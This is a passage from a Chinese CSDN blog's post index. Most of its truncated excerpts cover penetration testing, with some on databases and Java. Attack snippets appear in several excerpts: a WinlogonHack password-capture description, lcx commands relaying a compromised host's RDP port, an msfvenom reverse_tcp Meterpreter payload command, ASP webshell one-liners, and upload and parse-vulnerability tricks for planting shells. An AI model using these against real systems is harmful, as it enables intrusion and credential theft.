- 博客(27)
- 资源 (131)
- 收藏
- 关注
RSS订阅原创 MySQL之——mysql安装error:the security setting could not be applied
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84647325在安装mysql时,出现The security settings could not be applied to the database because the connection has failed with the following error...
2018-11-30 13:10:23
1122
1
原创 WinlogonHack之——获取系统密码
WinlogonHack截取密码的原理WinlogonHack通过挂钩系统中的msgina.dll的WlxLoggedOutSAS函数记录登陆的账户密码。当有3389脸上服务器时。新创建的winlogon.exe将会在登录前加载,注册了"Startup" 的DLLHook函数。登陆成功后,会将密码写入到.dat文件中去,并取消Hook。实战WinlogonHack获取系统密码下载W...
2018-11-30 10:02:02
1448
转载 渗透之——3389脚本开启代码(vbs版)
将以下代码复制到记事本里并保存为rots.vbson error resume nextset utstreem=wscript.stdoutset instreem=wscript.stdinif (lcase(right(wscript.fullname,11))="wscript.exe") then set bjShell=wscript.createObject("ws...
2018-11-29 15:01:32
2304
原创 lcx.exe内网转发命令教程 + LCX免杀下载
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84625404本机: lcx -listen 2222 33332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx -slave 192.168.109.137 2222 127.0.0.1 3389192.168.109.137 为本机IP,2222...
2018-11-29 12:38:27
4524
1
原创 Kali之——字典生成工具Crunch的使用案例
具体案例:案例1:crunch 1 8#生成最小1位,最大8位,由26个小写字母为元素的所有组合案例2:crunch 1 6 abcdefg#生成 最小为1,最大为6.由abcdefg为元素的所有组合案例3:crunch 1 6 abcdefg\#生成 最小为1,最大为6.由abcdefg和空格为元素的所有组合(/代表空格)案例4:crunch 1 8 ...
2018-11-26 23:01:29
3495
转载 Kali之——KALI2.0 Meterpreter 运用
初试牛刀1、生产EXE 就用meterpreter (shell 一个含义) (KALI2.0以前版本 为 msfpayload )2.0后 新命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXXX LPORT=XXXX -f exe > 1234.exe2、默认生成地址是 ROOT 查看 后 直接...
2018-11-25 23:16:47
3721
原创 Linux之——使用rarcrack暴力破解RAR,ZIP,7Z压缩包
原文链接这里使用的软件名称叫rarcrack,其官方主页: http://rarcrack.sourceforge.net该软件用于暴力破解压缩文件的密码,但仅支持RAR, ZIP, 7Z这三种类型的压缩包,其特点是可以使用多线程,而且可以随时暂停与继续(暂停时会在当前目录生成一个xml文件,里面显示了正在尝试的一个密码)。这是真正的暴力破解,因为连字典都没用rarcrack安装方法...
2018-11-25 23:13:09
38423
11
转载 metasploit之——msfcli 不能使用,在新版metasploit不再有效
原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploitHi, 大家好, 这个一月份,我们做了一份关于 Metasploit 的命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。 取代...
2018-11-22 14:16:25
1152
转载 metasploitable2之——更改root密码
metasploitable2这个系统众所周知,一个用户名和密码是msfadmin。但是这个账号权限不全,我们想要改root密码来登陆为所欲为。也没试过破解,咱们索性就改了吧。就简单几行代码。。msfadmin@metasploitable:~$ sudo passwd root[sudo] password for msfadmin: #这里输入msfadmin...
2018-11-22 12:33:49
4660
原创 Kali之——所有工具的安装
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84329833apt-get updateapt-get install kali-linux-all
2018-11-21 20:51:25
20294
1
原创 Kali之——安装open-vm-tools实现虚拟机交互
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84310376首先换源。终端输入 leafpad /etc/apt/sources.list修改为以下几个镜像源#中科大kali源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free ...
2018-11-20 21:44:42
1538
原创 SQL注入之——sqli-labs-master 下载与安装
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84262285注意事项,写在前面。php版本一定要设置成 7 以下,7之后的mysql_都改成了mysqli_**了,用7以上版本的话会报错*****************************************************************...
2018-11-19 23:49:37
11894
1
转载 各种解析漏洞拿shell
一、IIS 6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以...
2018-11-18 23:55:55
1961
原创 各种一句话木马大全
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84206143<%eval request("c")%><%execute request("c")%><%execute(request("c"))%><%ExecuteGlobal request("sb&qu
2018-11-18 22:55:28
26694
2
原创 渗透之——Nmap+Zenmap+Amap+Zmap
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84204992Nmap第一部分 Nmap基础一、Nmap功能基本功能有三个: 1.探测主机是否在线; 2.扫描主机端口,嗅探所提供的网络服务 3.推断主机操作系统 主机探测: 探测网路上的主机,例如列出相应TCP和ICMP请求,i...
2018-11-18 21:21:30
13421
1
原创 burpsuite之——上传截断及截断原理介绍
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84197898一、简介截断的产生核心,就是chr(0)字符 。这个字符即不为空(Null),也不是空字符(""),更不是空格!当程序在输出含有chr(0)变量时,chr(0)后面的数据会被停止,换句话说,就是误把它当成结束符,后面的数据直接忽略,这就导致漏洞产生的原...
2018-11-18 14:04:09
6875
1
原创 Kali之——更新软件源
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84139317vim /etc/apt/sources.listdeb http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali k...
2018-11-16 14:54:30
1249
转载 Kali之——菜单中各工具功能
一、说明各工具kali官方简介(竖排):https://tools.kali.org/tools-listing安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbox,从功能上可以理解为运行在windows上的kali发行版,kali主流工具它都...
2018-11-15 18:22:48
3477
转载 AppScan之——使用过程中问题记录
一、AppScan安装时出现错误1603是因为之前安装过,没有卸载干净导致报错。解决方法如下:1、控制面板→程序和功能→选中程序卸载。2、删除AppScan安装路径以及下面的所有内容。 3、在系统[开始]->[运行(R)...]中,运行命令regedit来删除全部注册键(如果存在的话),以及下列的子 键: A.HKEY_LOCAL_MACHINE\SOFTWARE\IBM\ ...
2018-11-13 20:08:26
8043
原创 Error: could not find a distribution template for Kali/kali-rolling [duplicate]
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84033387问题重现:命令行输入:add-apt-repository ppa:yubico/stable && sudo apt-get update问题如下:# add-apt-repository ppa:yubico/stable ...
2018-11-13 18:15:58
8089
1
转载 Install WPScan on Debian 8 for WordPress Vulnerability Scanning
WPScan is a WordPress vulnerability scanner written in Ruby. It is sponsored by Sucuri and hosted on github. Using its security vulnerability database for WordPress core, plugins and themes it will pr...
2018-11-13 16:25:25
1170
原创 Gem load error while running wpscan in kali linux
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84030521remove packageapt remove wpscaninstall from sourcegit clone https://github.com/wpscanteam/wpscancd wpscan/bundle install ...
2018-11-13 16:02:22
126441
原创 Kali之——使用Easy-Creds工具攻击无线网络
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/83796584Easy-Creds是一个菜单式的破解工具。该工具允许用户打开一个无线网卡,并能实现一个无线接入点攻击平台。Easy-Creds可以创建一个欺骗访问点,并作为一个中间人攻击类型运行,进而分析用户的数据流和账户信息。它可以从SSL加密数据中恢复账户。本节将介绍使用E...
2018-11-07 00:18:28
1928
原创 JVM之——CMS
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/83722275前言CMS,全称Concurrent Low Pause Collector,是jdk1.4后期版本开始引入的新gc算法,在jdk5和jdk6中得到了进一步改进,它的主要适合场景是对响应时间的重要性需求 大于对吞吐量的要求,能够承受垃圾回收线程和应用线程共享处...
2018-11-04 23:37:08
5604
原创 Scala之——Scala与Java的互操作
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/83654966引入scala.collection.JavaConversions里的隐式转换方法。可以在代码中使用Scala缓冲,在调用Java方法时,这些对象会被自动封装成Java列表。举例来说,java.lang.ProcessBuilder类有一个以List<S...
2018-11-02 14:36:55
1315
转载 Spring Boot之——springboot做的controller服务,每隔一段时间后第一次请求耗时特别长
1、在访问任何一个接口后,此接口在短时间内访问速度都很正常。但就是在每隔一段时间后(大概几秒)第一个请求访问速度很慢,客户端显示耗时是3000ms,但服务器打印耗时正常就是60ms。2、本机windows环境调试的时候不会出现这种问题,部署到linux系统下出现此问题。问题:无论用浏览器、Postman、curl、Python(requests) 去访问接口,均得到第一次响应非常耗时,短时...
2018-11-01 21:01:50
5633
1
转载 Kali之——解决无法定位软件包 linux-headers 问题
恭喜你打开这篇文章! 当你打开这篇文章的时候,我就知道你肯定是在安装虚拟机的增强功能!而且在你更新无数个更新源后任然会发生无法定位软件包 linux-headers 问题,这个问题目前博主也不知道解决方案,也不知道是什么问题导致的。因此,博主给大家提供一个在线安装增强功能的办法,来解决这个问题。1.apt-get update //(更新目录)2.ap...
2018-11-01 14:37:16
14891
5
Navicat for Premium.rar
2020-07-30
Flume采集Nginx日志到新版Hive.rar
2019-09-20
Flume采集Nginx日志到Hive.rar
2019-08-01
Apache标准Log,Hive测试使用
2019-03-17
glibc-2.14 Hadoop专属glib
2019-03-12
avro-1.8.1
2019-02-28
freefloatftpserver1.0 漏洞重现
2019-02-14
VulnServer
2019-01-16
Easy File Sharing Web Server 7.2
2019-01-15
ImmunityDebugger
2019-01-15
sqoop1.46和1.47
2018-09-12
基于java开发的功能强大、配置灵活的数据库之间的同步工具
2018-05-16
《Spring IOC核心技术》- 冰河原创电子书
2023-01-28
冰河的渗透实战笔记-冰河.pdf
2021-05-18
Docker+K8S+GitLab/SVN+Jenkins+Harbor持续集成yaml安装文件
2021-05-12
深入理解高并发编程(冰河原创电子书)
2021-04-28
FastDFS6.06完整安装包
2021-04-13
MySQL8.0.19安装包
2021-04-10
流程引擎(Flowable+Activiti)
2020-07-28
nexus-2.11.2-03-bundle.rar
2020-06-15
Navicat For MongoDB 15.0.6
2020-06-13
linux库:compat-libstdc++-33-3.2.3-61
2020-04-20
MySQL各版本my.cnf配置文件.rar
2020-01-12
MySQL 8.0.18源码安装包.rar
2019-11-23
升级gcc与cmake所需的安装文件.rar
2019-11-23
CentOS6.8 64位安装镜像.rar
2019-11-16
性能测试工具(postman+ab+jmeter).rar
2019-10-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人